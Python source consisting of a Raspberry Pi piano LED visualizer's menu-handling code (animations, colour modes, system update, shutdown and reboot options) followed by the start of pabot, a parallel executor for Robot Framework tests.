if choice == "Refresh ports" or choice == "Input" or choice == "Playback":
self.update_ports()
if choice == "Reset Bluetooth service":
self.render_message("Reseting BL service", "", 1000)
os.system("sudo systemctl restart btmidi.service")
if choice == "Connect ports":
self.render_message("Connecting ports", "", 2000)
self.midiports.connectall()
if choice == "Disconnect ports":
self.render_message("Disconnecting ports", "", 1000)
call("sudo aconnect -x", shell=True)
if location == "LED_animations":
if choice == "Theater Chase":
self.t = threading.Thread(target=theaterChase, args=(self.ledstrip.strip, Color(127, 127, 127),
self.ledsettings, self))
self.t.start()
if choice == "Theater Chase Rainbow":
self.t = threading.Thread(target=theaterChaseRainbow, args=(self.ledstrip.strip, self.ledsettings,
self, 5))
self.t.start()
if choice == "Sound of da police":
self.t = threading.Thread(target=sound_of_da_police, args=(self.ledstrip.strip, self.ledsettings,
self, 1))
self.t.start()
if choice == "Scanner":
self.t = threading.Thread(target=scanner, args=(self.ledstrip.strip, self.ledsettings, self, 1))
self.t.start()
if choice == "Clear":
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
if location == "Breathing":
if choice == "Fast":
self.t = threading.Thread(target=breathing, args=(self.ledstrip.strip, self.ledsettings, self, 5))
self.t.start()
if choice == "Medium":
self.t = threading.Thread(target=breathing, args=(self.ledstrip.strip, self.ledsettings, self, 10))
self.t.start()
if choice == "Slow":
self.t = threading.Thread(target=breathing, args=(self.ledstrip.strip, self.ledsettings, self, 25))
self.t.start()
if location == "Rainbow":
if choice == "Fast":
self.t = threading.Thread(target=rainbow, args=(self.ledstrip.strip, self.ledsettings, self, 2))
self.t.start()
if choice == "Medium":
self.t = threading.Thread(target=rainbow, args=(self.ledstrip.strip, self.ledsettings, self, 20))
self.t.start()
if choice == "Slow":
self.t = threading.Thread(target=rainbow, args=(self.ledstrip.strip, self.ledsettings, self, 50))
self.t.start()
if location == "Rainbow_Cycle":
if choice == "Fast":
self.t = threading.Thread(target=rainbowCycle, args=(self.ledstrip.strip, self.ledsettings, self, 1))
self.t.start()
if choice == "Medium":
self.t = threading.Thread(target=rainbowCycle, args=(self.ledstrip.strip, self.ledsettings, self, 20))
self.t.start()
if choice == "Slow":
self.t = threading.Thread(target=rainbowCycle, args=(self.ledstrip.strip, self.ledsettings, self, 50))
self.t.start()
if location == "LED_animations":
if choice == "Stop animation":
self.screensaver_is_running = False
if location == "Other_Settings":
if choice == "System Info":
screensaver(self, self.midiports, self.saving, self.ledstrip, self.ledsettings)
if location == "Rainbow_Colors":
self.ledsettings.color_mode = "Rainbow"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if choice == "Add Color":
self.ledsettings.addcolor()
if choice == "Add Note Offset":
self.ledsettings.add_note_offset()
self.update_led_note_offsets()
self.show()
if choice == "Append Note Offset":
self.ledsettings.append_note_offset()
self.update_led_note_offsets()
self.show()
if choice == "Delete":
if location.startswith('Offset'):
self.ledsettings.del_note_offset(location.replace('Offset','').split('_')[0])
self.update_led_note_offsets()
self.go_back()
self.show()
else:
self.ledsettings.deletecolor(location.replace('Color', ''))
if location == "Multicolor" and choice == "Confirm":
self.ledsettings.color_mode = "Multicolor"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Speed" and choice == "Confirm":
self.ledsettings.color_mode = "Speed"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Gradient" and choice == "Confirm":
self.ledsettings.color_mode = "Gradient"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Scale_Coloring" and choice == "Confirm":
self.ledsettings.color_mode = "Scale"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
print("color mode set to Scale")
if location == "Scale_key":
self.ledsettings.scale_key = self.ledsettings.scales.index(choice)
self.usersettings.change_setting_value("scale_key", self.ledsettings.scale_key)
if location == "Sequences":
if choice == "Update":
refresh_result = self.update_sequence_list()
if not refresh_result:
self.render_message("Something went wrong", "Make sure your sequence file is correct", 1500)
self.show()
else:
self.ledsettings.set_sequence(self.pointer_position, 0)
if location == "Sides_Color":
if choice == "Custom RGB":
self.ledsettings.adjacent_mode = "RGB"
if choice == "Same as main":
self.ledsettings.adjacent_mode = "Main"
if choice == "Off":
self.ledsettings.adjacent_mode = "Off"
self.usersettings.change_setting_value("adjacent_mode", self.ledsettings.adjacent_mode)
if location == "Reset_to_default_settings":
if choice == "Confirm":
self.usersettings.reset_to_default()
else:
self.go_back()
if location == "Update_visualizer":
if choice == "Confirm":
self.render_message("Updating...", "reboot is required", 5000)
call("sudo git reset --hard HEAD", shell=True)
call("sudo git checkout .", shell=True)
call("sudo git clean -fdx", shell=True)
call("sudo git pull origin master", shell=True)
self.go_back()
if location == "Shutdown":
if choice == "Confirm":
self.render_message("", "Shutting down...", 5000)
call("sudo /sbin/shutdown -h now", shell=True)
else:
self.go_back()
if location == "Reboot":
if choice == "Confirm":
self.render_message("", "Rebooting...", 5000)
call("sudo /sbin/reboot now", shell=True)
else:
self.go_back()
if location == "Skipped_notes":
self.ledsettings.skipped_notes = choice
self.usersettings.change_setting_value("skipped_notes", self.ledsettings.skipped_notes)
if location == "Content":
self.toggle_screensaver_settings(choice)
if location == "Led_animation":
self.led_animation = choice
self.usersettings.change_setting_value("led_animation", choice)
def change_value(self, value):
if value == "LEFT":
value = -1
elif value == "RIGHT":
value = 1
if self.currentlocation == "Brightness":
self.ledstrip.change_brightness(value * self.speed_multiplier)
if self.currentlocation == "Led_count":
self.ledstrip.change_led_count(value)
if self.currentlocation == "Shift":
self.ledstrip.change_shift(value)
if self.currentlocation == "Reverse":
self.ledstrip.change_reverse(value)
if self.currentlocation == "Backlight_Brightness":
if self.current_choice == "Power":
self.ledsettings.change_backlight_brightness(value * self.speed_multiplier)
if self.currentlocation == "Backlight_Color":
self.ledsettings.change_backlight_color(self.current_choice, value * self.speed_multiplier)
if self.currentlocation == "Custom_RGB":
self.ledsettings.change_adjacent_color(self.current_choice, value * self.speed_multiplier)
if self.currentlocation == "RGB":
self.ledsettings.change_color(self.current_choice, value * self.speed_multiplier)
self.ledsettings.color_mode = "Single"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if "RGB_Color" in self.currentlocation:
self.ledsettings.change_multicolor(self.current_choice, self.currentlocation, value * self.speed_multiplier)
if "Key_range" in self.currentlocation:
self.ledsettings.change_multicolor_range(self.current_choice, self.currentlocation,
value * self.speed_multiplier)
self.ledsettings.light_keys_in_range(self.currentlocation)
if self.current_choice == "LED Number" and self.currentlocation.startswith("Offset"):
self.ledsettings.update_note_offset_lcd(self.current_choice, self.currentlocation, value * self.speed_multiplier)
if self.current_choice == "LED Offset" and self.currentlocation.startswith("Offset"):
self.ledsettings.update_note_offset_lcd(self.current_choice, self.currentlocation, value * self.speed_multiplier)
if self.current_choice == "Offset":
self.ledsettings.rainbow_offset = self.ledsettings.rainbow_offset + value * 5 * self.speed_multiplier
if self.current_choice == "Scale":
self.ledsettings.rainbow_scale = self.ledsettings.rainbow_scale + value * 5 * self.speed_multiplier
if self.current_choice == "Timeshift":
self.ledsettings.rainbow_timeshift = self.ledsettings.rainbow_timeshift + value * self.speed_multiplier
if self.currentlocation == "Start_delay":
self.screensaver_delay = int(self.screensaver_delay) + (value * self.speed_multiplier)
if self.screensaver_delay < 0:
self.screensaver_delay = 0
self.usersettings.change_setting_value("screensaver_delay", self.screensaver_delay)
if self.currentlocation == "Turn_off_screen_delay":
self.screen_off_delay = int(self.screen_off_delay) + (value * self.speed_multiplier)
if self.screen_off_delay < 0:
self.screen_off_delay = 0
self.usersettings.change_setting_value("screen_off_delay", self.screen_off_delay)
if self.currentlocation == "Led_animation_delay":
self.led_animation_delay = int(self.led_animation_delay) + (value * self.speed_multiplier)
if self.led_animation_delay < 0:
self.led_animation_delay = 0
self.usersettings.change_setting_value("led_animation_delay", self.led_animation_delay)
if self.currentlocation == "Color_for_slow_speed":
self.ledsettings.speed_slowest[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.speed_slowest[self.current_choice.lower()] > 255:
self.ledsettings.speed_slowest[self.current_choice.lower()] = 255
if self.ledsettings.speed_slowest[self.current_choice.lower()] < 0:
self.ledsettings.speed_slowest[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("speed_slowest_" + self.current_choice.lower(),
self.ledsettings.speed_slowest[self.current_choice.lower()])
if self.currentlocation == "Color_for_fast_speed":
self.ledsettings.speed_fastest[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.speed_fastest[self.current_choice.lower()] > 255:
self.ledsettings.speed_fastest[self.current_choice.lower()] = 255
if self.ledsettings.speed_fastest[self.current_choice.lower()] < 0:
self.ledsettings.speed_fastest[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("speed_fastest_" + self.current_choice.lower(),
self.ledsettings.speed_fastest[self.current_choice.lower()])
if self.currentlocation == "Period":
self.ledsettings.speed_period_in_seconds = round(self.ledsettings.speed_period_in_seconds + (value * .1) *
self.speed_multiplier, 1)
if self.ledsettings.speed_period_in_seconds < 0.1:
self.ledsettings.speed_period_in_seconds = 0.1
self.usersettings.change_setting_value("speed_period_in_seconds", self.ledsettings.speed_period_in_seconds)
if self.currentlocation == "Max_notes_in_period":
self.ledsettings.speed_max_notes += value * self.speed_multiplier
if self.ledsettings.speed_max_notes < 2:
self.ledsettings.speed_max_notes = 2
self.usersettings.change_setting_value("speed_max_notes", self.ledsettings.speed_max_notes)
if self.currentlocation == "Gradient_start":
self.ledsettings.gradient_start[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.gradient_start[self.current_choice.lower()] > 255:
self.ledsettings.gradient_start[self.current_choice.lower()] = 255
if self.ledsettings.gradient_start[self.current_choice.lower()] < 0:
self.ledsettings.gradient_start[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("gradient_start_" + self.current_choice.lower(),
self.ledsettings.gradient_start[self.current_choice.lower()])
if self.currentlocation == "Gradient_end":
self.ledsettings.gradient_end[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.gradient_end[self.current_choice.lower()] > 255:
self.ledsettings.gradient_end[self.current_choice.lower()] = 255
if self.ledsettings.gradient_end[self.current_choice.lower()] < 0:
self.ledsettings.gradient_end[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("gradient_end_" + self.current_choice.lower(),
self.ledsettings.gradient_end[self.current_choice.lower()])
if self.currentlocation == "Color_in_scale":
self.ledsettings.key_in_scale[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.key_in_scale[self.current_choice.lower()] > 255:
self.ledsettings.key_in_scale[self.current_choice.lower()] = 255
if self.ledsettings.key_in_scale[self.current_choice.lower()] < 0:
self.ledsettings.key_in_scale[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("key_in_scale_" + self.current_choice.lower(),
self.ledsettings.key_in_scale[self.current_choice.lower()])
if self.currentlocation == "Color_not_in_scale":
self.ledsettings.key_not_in_scale[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.key_not_in_scale[self.current_choice.lower()] > 255:
self.ledsettings.key_not_in_scale[self.current_choice.lower()] = 255
if self.ledsettings.key_not_in_scale[self.current_choice.lower()] < 0:
self.ledsettings.key_not_in_scale[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("key_not_in_scale_" + self.current_choice.lower(),
self.ledsettings.key_not_in_scale[self.current_choice.lower()])
# Learn MIDI
if self.currentlocation == "Learn_MIDI":
if self.current_choice == "Practice":
self.learning.change_practice(value)
if self.current_choice == "Hands":
self.learning.change_hands(value)
if self.current_choice == "Mute hand":
self.learning.change_mute_hand(value)
if self.current_choice == "Start point":
self.learning.change_start_point(value)
if self.current_choice == "End point":
self.learning.change_end_point(value)
if self.current_choice == "Set tempo":
self.learning.change_set_tempo(value)
if self.current_choice == "Hand color R":
self.learning.change_hand_color(value, 'RIGHT')
if self.current_choice == "Hand color L":
self.learning.change_hand_color(value, 'LEFT')
self.show()
def speed_change(self):
if self.speed_multiplier == 10:
self.speed_multiplier = 1
elif self.speed_multiplier == 1:
self.speed_multiplier = 10
|
pabot.py
|
#!/usr/bin/env python
# Copyright 2014->future! Mikko Korpela
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# partly based on work by Nokia Solutions and Networks Oyj
"""A parallel executor for Robot Framework test cases.
Version 2.0.1
Supports all Robot Framework command line options and also following
options (these must be before normal RF options):
--verbose
more output
--command [ACTUAL COMMANDS TO START ROBOT EXECUTOR] --end-command
RF script for situations where pybot is not used directly
--processes [NUMBER OF PROCESSES]
How many parallel executors to use (default max of 2 and cpu count)
--testlevelsplit
Split execution on test level instead of default suite level.
If .pabotsuitenames contains both tests and suites then this
will only affect new suites and split only them.
Leaving this flag out when both suites and tests in
.pabotsuitenames file will also only affect new suites and
add them as suite files.
--resourcefile [FILEPATH]
Indicator for a file that can contain shared variables for
distributing resources.
--pabotlib
Start PabotLib remote server. This enables locking and resource
distribution between parallel test executions.
--pabotlibhost [HOSTNAME]
Host name of the PabotLib remote server (default is 127.0.0.1)
--pabotlibport [PORT]
Port number of the PabotLib remote server (default is 8270)
--ordering [FILE PATH]
Optionally give execution order from a file.
--suitesfrom [FILEPATH TO OUTPUTXML]
Optionally read suites from output.xml file. Failed suites will run
first and longer running ones will be executed before shorter ones.
--argumentfile[INTEGER] [FILEPATH]
Run same suite with multiple argumentfile options.
For example "--argumentfile1 arg1.txt --argumentfile2 arg2.txt".
Copyright 2019 Mikko Korpela - Apache 2 License
"""
from __future__ import absolute_import, print_function
import datetime
import hashlib
import os
import random
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import uuid
from collections import namedtuple
from contextlib import closing
from glob import glob
from io import BytesIO, StringIO
from multiprocessing.pool import ThreadPool
from robot import __version__ as ROBOT_VERSION
from robot import rebot
from robot.api import ExecutionResult
from robot.conf import RobotSettings
from robot.errors import DataError, Information
from robot.libraries.Remote import Remote
from robot.model import ModelModifier
from robot.result.visitor import ResultVisitor
from robot.run import USAGE
from robot.running import TestSuiteBuilder
from robot.utils import PY2, SYSTEM_ENCODING, ArgumentParser, is_unicode
from . import pabotlib
from .arguments import parse_args, parse_execution_item_line
from .clientwrapper import make_order
from .execution_items import (
DynamicSuiteItem,
ExecutionItem,
GroupEndItem,
GroupItem,
GroupStartItem,
HivedItem,
SuiteItem,
SuiteItems,
TestItem,
)
from .result_merger import merge
try:
import queue # type: ignore
except ImportError:
import Queue as queue # type: ignore
try:
from shlex import quote # type: ignore
except ImportError:
from pipes import quote # type: ignore
from typing import IO, Any, Dict, List, Optional, Tuple, Union
CTRL_C_PRESSED = False
MESSAGE_QUEUE = queue.Queue()
EXECUTION_POOL_IDS = [] # type: List[int]
EXECUTION_POOL_ID_LOCK = threading.Lock()
POPEN_LOCK = threading.Lock()
_PABOTLIBURI = "127.0.0.1:8270"
_PABOTLIBPROCESS = None # type: Optional[subprocess.Popen]
_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE = (
"!#$^&*?[(){}<>~;'`\\|= \t\n" # does not contain '"'
)
_BAD_CHARS_SET = set(_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
_ABNORMAL_EXIT_HAPPENED = False
_COMPLETED_LOCK = threading.Lock()
_NOT_COMPLETED_INDEXES = [] # type: List[int]
_ROBOT_EXTENSIONS = [
".html",
".htm",
".xhtml",
".tsv",
".rst",
".rest",
".txt",
".robot",
]
_ALL_ELAPSED = [] # type: List[Union[int, float]]
class Color:
SUPPORTED_OSES = ["posix"]
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"
YELLOW = "\033[93m"
def _mapOptionalQuote(command_args):
# type: (List[str]) -> List[str]
if os.name == "posix":
return [quote(arg) for arg in command_args]
return [
arg if set(arg).isdisjoint(_BAD_CHARS_SET) else '"%s"' % arg
for arg in command_args
]
def execute_and_wait_with(item):
# type: ('QueueItem') -> None
global CTRL_C_PRESSED, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
is_last = _NUMBER_OF_ITEMS_TO_BE_EXECUTED == 1
_NUMBER_OF_ITEMS_TO_BE_EXECUTED -= 1
if CTRL_C_PRESSED:
# Keyboard interrupt has happened!
return
time.sleep(0)
try:
datasources = [
d.encode("utf-8") if PY2 and is_unicode(d) else d for d in item.datasources
]
caller_id = uuid.uuid4().hex
name = item.display_name
outs_dir = os.path.join(item.outs_dir, item.argfile_index, str(item.index))
os.makedirs(outs_dir)
cmd = _create_command_for_execution(
caller_id, datasources, is_last, item, outs_dir
)
if item.hive:
_hived_execute(
item.hive,
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
)
else:
_try_execute_and_wait(
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
item.execution_item.type != "test",
)
outputxml_preprocessing(
item.options, outs_dir, name, item.verbose, _make_id(), caller_id
)
except:
_write(traceback.format_exc())
def _create_command_for_execution(caller_id, datasources, is_last, item, outs_dir):
options = item.options.copy()
if item.command == ['robot'] and not options["listener"]:
options["listener"] = ["RobotStackTracer"]
cmd = (
item.command
+ _options_for_custom_executor(
options,
outs_dir,
item.execution_item,
item.argfile,
caller_id,
is_last,
item.index,
item.last_level,
item.processes,
)
+ datasources
)
return _mapOptionalQuote(cmd)
def _pabotlib_in_use():
return _PABOTLIBPROCESS or _PABOTLIBURI != "127.0.0.1:8270"
def _hived_execute(
hive, cmd, outs_dir, item_name, verbose, pool_id, caller_id, my_index=-1
):
plib = None
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
make_order(hive, " ".join(cmd), outs_dir)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
def _try_execute_and_wait(
cmd,
outs_dir,
item_name,
verbose,
pool_id,
caller_id,
my_index=-1,
show_stdout_on_failure=False,
):
# type: (List[str], str, str, bool, int, str, int, bool) -> None
plib = None
is_ignored = False
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
with open(os.path.join(outs_dir, cmd[0] + "_stdout.out"), "w") as stdout:
with open(os.path.join(outs_dir, cmd[0] + "_stderr.out"), "w") as stderr:
process, (rc, elapsed) = _run(
cmd, stderr, stdout, item_name, verbose, pool_id, my_index
)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
is_ignored = _is_ignored(plib, caller_id)
if is_ignored and os.path.isdir(outs_dir):
shutil.rmtree(outs_dir)
# Thread-safe list append
_ALL_ELAPSED.append(elapsed)
_result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
)
def _result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
):
if is_ignored:
_write_with_id(
process,
pool_id,
my_index,
_execution_ignored_message(item_name, stdout, stderr, elapsed, verbose),
)
elif rc != 0:
_write_with_id(
process,
pool_id,
my_index,
_execution_failed_message(
item_name, stdout, stderr, rc, verbose or show_stdout_on_failure
),
Color.RED,
)
else:
_write_with_id(
process,
pool_id,
my_index,
_execution_passed_message(item_name, stdout, stderr, elapsed, verbose),
Color.GREEN,
)
def _is_ignored(plib, caller_id): # type: (Remote, str) -> bool
return plib.run_keyword("is_ignored_execution", [caller_id], {})
# optionally invoke rebot for output.xml preprocessing to get --RemoveKeywords
# and --flattenkeywords applied => result: much smaller output.xml files + faster merging + avoid MemoryErrors
def outputxml_preprocessing(options, outs_dir, item_name, verbose, pool_id, caller_id):
# type: (Dict[str, Any], str, str, bool, int, str) -> None
try:
remove_keywords = options["removekeywords"]
flatten_keywords = options["flattenkeywords"]
if not remove_keywords and not flatten_keywords:
# => no preprocessing needed if no removekeywords or flattenkeywords present
return
remove_keywords_args = [] # type: List[str]
flatten_keywords_args = [] # type: List[str]
for k in remove_keywords:
remove_keywords_args += ["--removekeywords", k]
for k in flatten_keywords:
flatten_keywords_args += ["--flattenkeywords", k]
outputxmlfile = os.path.join(outs_dir, "output.xml")
oldsize = os.path.getsize(outputxmlfile)
cmd = (
[
"rebot",
"--log",
"NONE",
"--report",
"NONE",
"--xunit",
"NONE",
"--consolecolors",
"off",
"--NoStatusRC",
]
+ remove_keywords_args
+ flatten_keywords_args
+ ["--output", outputxmlfile, outputxmlfile]
)
cmd = _mapOptionalQuote(cmd)
_try_execute_and_wait(
cmd,
outs_dir,
"preprocessing output.xml on " + item_name,
verbose,
pool_id,
caller_id,
)
newsize = os.path.getsize(outputxmlfile)
perc = 100 * newsize / oldsize
if verbose:
_write(
"%s [main] [%s] Filesize reduced from %s to %s (%0.2f%%) for file %s"
% (
datetime.datetime.now(),
pool_id,
oldsize,
newsize,
perc,
outputxmlfile,
)
)
except:
print(sys.exc_info())
def _write_with_id(process, pool_id, item_index, message, color=None, timestamp=None):
timestamp = timestamp or datetime.datetime.now()
_write(
"%s [PID:%s] [%s] [ID:%s] %s"
% (timestamp, process.pid, pool_id, item_index, message),
color,
)
def _make_id(): # type: () -> int
global EXECUTION_POOL_IDS, EXECUTION_POOL_ID_LOCK
thread_id = threading.current_thread().ident
assert thread_id is not None
with EXECUTION_POOL_ID_LOCK:
if thread_id not in EXECUTION_POOL_IDS:
EXECUTION_POOL_IDS += [thread_id]
return EXECUTION_POOL_IDS.index(thread_id)
def _increase_completed(plib, my_index):
# type: (Remote, int) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
if my_index not in _NOT_COMPLETED_INDEXES:
return
_NOT_COMPLETED_INDEXES.remove(my_index)
if _NOT_COMPLETED_INDEXES:
plib.run_keyword(
"set_parallel_value_for_key",
[
pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE,
_NOT_COMPLETED_INDEXES[0],
],
{},
)
if len(_NOT_COMPLETED_INDEXES) == 1:
plib.run_keyword(
"set_parallel_value_for_key", ["pabot_only_last_executing", 1], {}
)
def _run(command, stderr, stdout, item_name, verbose, pool_id, item_index):
# type: (List[str], IO[Any], IO[Any], str, bool, int, int) -> Tuple[Union[subprocess.Popen[bytes], subprocess.Popen], Tuple[int, float]]
timestamp = datetime.datetime.now()
cmd = " ".join(command)
if PY2:
cmd = cmd.decode("utf-8").encode(SYSTEM_ENCODING)
# avoid hitting https://bugs.python.org/issue10394
with POPEN_LOCK:
process = subprocess.Popen(cmd, shell=True, stderr=stderr, stdout=stdout)
if verbose:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING PARALLEL %s with command:\n%s" % (item_name, cmd),
timestamp=timestamp,
)
else:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING %s" % item_name,
timestamp=timestamp,
)
return process, _wait_for_return_code(process, item_name, pool_id, item_index)
def _wait_for_return_code(process, item_name, pool_id, item_index):
rc = None
elapsed = 0
ping_time = ping_interval = 150
while rc is None:
rc = process.poll()
time.sleep(0.1)
elapsed += 1
if elapsed == ping_time:
ping_interval += 50
ping_time += ping_interval
_write_with_id(
process,
pool_id,
item_index,
"still running %s after %s seconds" % (item_name, elapsed / 10.0),
)
return rc, elapsed / 10.0
def _read_file(file_handle):
try:
with open(file_handle.name, "r") as content_file:
content = content_file.read()
return content
except:
return "Unable to read file %s" % file_handle
def _execution_failed_message(suite_name, stdout, stderr, rc, verbose):
if not verbose:
return "FAILED %s" % suite_name
return "Execution failed in %s with %d failing test(s)\n%s\n%s" % (
suite_name,
rc,
_read_file(stdout),
_read_file(stderr),
)
def _execution_passed_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "PASSED %s in %s seconds" % (suite_name, elapsed)
return "PASSED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _execution_ignored_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "IGNORED %s" % suite_name
return "IGNORED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _options_for_custom_executor(*args):
# type: (Any) -> List[str]
return _options_to_cli_arguments(_options_for_executor(*args))
def _options_for_executor(
options,
outs_dir,
execution_item,
argfile,
caller_id,
is_last,
queueIndex,
last_level,
processes,
):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["test"] = options.get("test", [])[:]
options["suite"] = options.get("suite", [])[:]
execution_item.modify_options_for_executor(options)
options["outputdir"] = "%OUTPUTDIR%" if execution_item.type == "hived" else outs_dir
options["variable"] = options.get("variable", [])[:]
options["variable"].append("CALLER_ID:%s" % caller_id)
pabotLibURIVar = "PABOTLIBURI:%s" % _PABOTLIBURI
# Prevent multiple appending of PABOTLIBURI variable setting
if pabotLibURIVar not in options["variable"]:
options["variable"].append(pabotLibURIVar)
pabotExecutionPoolId = "PABOTEXECUTIONPOOLID:%d" % _make_id()
if pabotExecutionPoolId not in options["variable"]:
options["variable"].append(pabotExecutionPoolId)
pabotIsLast = "PABOTISLASTEXECUTIONINPOOL:%s" % ("1" if is_last else "0")
if pabotIsLast not in options["variable"]:
options["variable"].append(pabotIsLast)
pabotProcesses = "PABOTNUMBEROFPROCESSES:%s" % str(processes)
if pabotProcesses not in options["variable"]:
options["variable"].append(pabotProcesses)
pabotIndex = pabotlib.PABOT_QUEUE_INDEX + ":" + str(queueIndex)
if pabotIndex not in options["variable"]:
options["variable"].append(pabotIndex)
if last_level is not None:
pabotLastLevel = pabotlib.PABOT_LAST_LEVEL + ":" + str(last_level)
if pabotLastLevel not in options["variable"]:
options["variable"].append(pabotLastLevel)
if argfile:
_modify_options_for_argfile_use(argfile, options, execution_item.top_name())
options["argumentfile"] = argfile
return _set_terminal_coloring_options(options)
def _modify_options_for_argfile_use(argfile, options, root_name):
argfile_opts, _ = ArgumentParser(
USAGE,
auto_pythonpath=False,
auto_argumentfile=True,
env_options="ROBOT_OPTIONS",
).parse_args(["--argumentfile", argfile])
old_name = options.get("name", root_name)
if argfile_opts["name"]:
new_name = argfile_opts["name"]
_replace_base_name(new_name, old_name, options, "suite")
if not options["suite"]:
_replace_base_name(new_name, old_name, options, "test")
if "name" in options:
del options["name"]
def _replace_base_name(new_name, old_name, options, key):
if isinstance(options.get(key, None), str):
options[key] = new_name + options[key][len(old_name) :]
elif key in options:
options[key] = [new_name + s[len(old_name) :] for s in options.get(key, [])]
def _set_terminal_coloring_options(options):
if ROBOT_VERSION >= "2.9":
options["consolecolors"] = "off"
options["consolemarkers"] = "off"
else:
options["monitorcolors"] = "off"
if ROBOT_VERSION >= "2.8" and ROBOT_VERSION < "2.9":
options["monitormarkers"] = "off"
return options
def _options_to_cli_arguments(opts): # type: (dict) -> List[str]
res = [] # type: List[str]
for k, v in opts.items():
if isinstance(v, str):
res += ["--" + str(k), str(v)]
elif PY2 and is_unicode(v):
res += ["--" + str(k), v.encode("utf-8")]
elif isinstance(v, bool) and (v is True):
res += ["--" + str(k)]
elif isinstance(v, list):
for value in v:
if PY2 and is_unicode(value):
res += ["--" + str(k), value.encode("utf-8")]
else:
res += ["--" + str(k), str(value)]
return res
def _group_by_groups(tokens):
result = []
group = None
for token in tokens:
if isinstance(token, GroupStartItem):
if group is not None:
raise DataError(
"Ordering: Group can not contain a group. Encoutered '{'"
)
group = GroupItem()
result.append(group)
continue
if isinstance(token, GroupEndItem):
if group is None:
raise DataError(
"Ordering: Group end tag '}' encountered before start '{'"
)
group = None
continue
if group is not None:
group.add(token)
else:
result.append(token)
return result
def hash_directory(digest, path):
if os.path.isfile(path):
digest.update(_digest(_norm_path(path)))
get_hash_of_file(path, digest)
return
for root, _, files in os.walk(path):
for name in sorted(files):
file_path = os.path.join(root, name)
if os.path.isfile(file_path) and any(
file_path.endswith(p) for p in _ROBOT_EXTENSIONS
):
# DO NOT ALLOW CHANGE TO FILE LOCATION
digest.update(_digest(_norm_path(root)))
# DO THESE IN TWO PHASES BECAUSE SEPARATOR DIFFERS IN DIFFERENT OS
digest.update(_digest(name))
get_hash_of_file(file_path, digest)
def _norm_path(path):
return "/".join(os.path.normpath(path).split(os.path.sep))
def _digest(text):
text = text.decode("utf-8") if PY2 and not is_unicode(text) else text
return hashlib.sha1(text.encode("utf-8")).digest()
def get_hash_of_file(filename, digest):
if not os.path.isfile(filename):
return
with open(filename, "rb") as f_obj:
while True:
buf = f_obj.read(1024 * 1024)
if not buf:
break
digest.update(buf)
def get_hash_of_dirs(directories):
digest = hashlib.sha1()
for directory in directories:
hash_directory(digest, directory)
return digest.hexdigest()
IGNORED_OPTIONS = [
"pythonpath",
"outputdir",
"output",
"log",
"report",
"removekeywords",
"flattenkeywords",
"tagstatinclude",
"tagstatexclude",
"tagstatcombine",
"critical",
"noncritical",
"tagstatlink",
"metadata",
"tagdoc",
]
def get_hash_of_command(options, pabot_args):
digest = hashlib.sha1()
hopts = dict(options)
for option in options:
if option in IGNORED_OPTIONS or options[option] == []:
del hopts[option]
if pabot_args.get("testlevelsplit"):
hopts["testlevelsplit"] = True
digest.update(repr(sorted(hopts.items())).encode("utf-8"))
return digest.hexdigest()
Hashes = namedtuple("Hashes", ["dirs", "cmd", "suitesfrom"])
def _suitesfrom_hash(pabot_args):
if "suitesfrom" in pabot_args:
digest = hashlib.sha1()
get_hash_of_file(pabot_args["suitesfrom"], digest)
return digest.hexdigest()
else:
return "no-suites-from-option"
if PY2:
